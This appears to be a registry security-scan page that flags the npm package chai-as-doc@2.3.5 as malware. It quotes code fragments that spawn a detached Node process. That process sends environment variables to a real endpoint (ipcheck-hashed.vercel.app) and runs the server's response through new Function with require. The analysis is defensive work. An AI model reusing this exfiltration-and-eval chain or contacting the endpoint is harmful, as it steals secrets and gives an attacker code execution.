registry  /  chai-as-doc  /  2.3.5

chai-as-doc@2.3.5

This document describes the management of vulnerabilities for the project and all modules within the organization.

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Runtime middleware invocation starts a detached background Node process. That process sends environment data to a remote endpoint and executes returned JavaScript with CommonJS require access.

Static reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
Consumer imports the package and invokes its exported middleware initializer.
Impact
Remote operator can receive the child environment object and run arbitrary Node code in the consumer environment.
Mechanism
Detached environment exfiltration followed by remote code execution.
Attack narrative
When a consumer invokes the exported middleware, `index.js` launches `lib/initializeCaller.js` as a detached child. The child decodes a hidden endpoint, POSTs its environment object, then compiles and executes the response using `new Function` with `require` supplied. This grants the endpoint operator arbitrary code execution in the consumer's Node environment and exposes the process environment sent by the child.
Rationale
Source inspection confirms a concrete runtime exfiltration and remote payload-execution chain; it is not merely a static primitive. The absence of lifecycle hooks limits automatic installation impact but does not remove the malicious runtime behavior.
Evidence
package.jsonindex.jslib/initializeCaller.jsfile.js
Network endpoints1
ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` exports middleware that spawns a detached Node child at runtime.
  • `lib/initializeCaller.js` decodes `https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df`.
  • The child POSTs its constructed `process.env` object to that endpoint.
  • The child executes server response through `new Function("require", response.data)`.
  • No lifecycle scripts are declared in `package.json`; activation follows importing and invoking middleware.
Evidence against
  • No package files show install-time lifecycle hooks.
  • No confirmed file deletion, persistence, or AI-agent control-surface mutation.
  • The endpoint header variables are decoded but not used by the active request.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 17 file(s), 53.3 KB of source, external domains: github.com

Source & flagged code

7 flagged · loading source
index.jsView file
3const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants');
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L3
3Cross-file remote execution chain: index.js spawns lib/initializeCaller.js; helper contains network access plus dynamic code execution. L3: const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants'); ... L37: function runBackgroundTask(args) { L38: const scriptPath = path.resolve(__dirname, './lib/initializeCaller.js'); L39:
High
Cross File Remote Execution Context

Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.

index.jsView on unpkg · L3
matchType = malicious_source_fingerprint_signature signature = 3522c2fe164c56ca signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = cookie-phase@2.3.5 matchedPath = index.js matchedIdentity = npm:Y29va2llLXBoYXNl:2.3.5 similarity = 1.000 shingleOverlap = 12 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
lib/initializeCaller.jsView file
28.then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Eval

Package source references dynamic code evaluation.

lib/initializeCaller.jsView on unpkg · L28
13const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); L15: const apiHeaderValue = atob(process.env.DEV_SECRET_VALUE); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/initializeCaller.jsView on unpkg · L13
2L3: const axios = require("axios"); L4: const process = { ... L12: (async function initializeCaller(..._args) { L13: const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/initializeCaller.jsView on unpkg · L2
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

6 High3 Medium3 Low
HighChild Processindex.js
HighEvallib/initializeCaller.js
HighSame File Env Network Executionlib/initializeCaller.js
HighCross File Remote Execution Contextindex.js
HighBase64 Obscured Urllib/initializeCaller.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings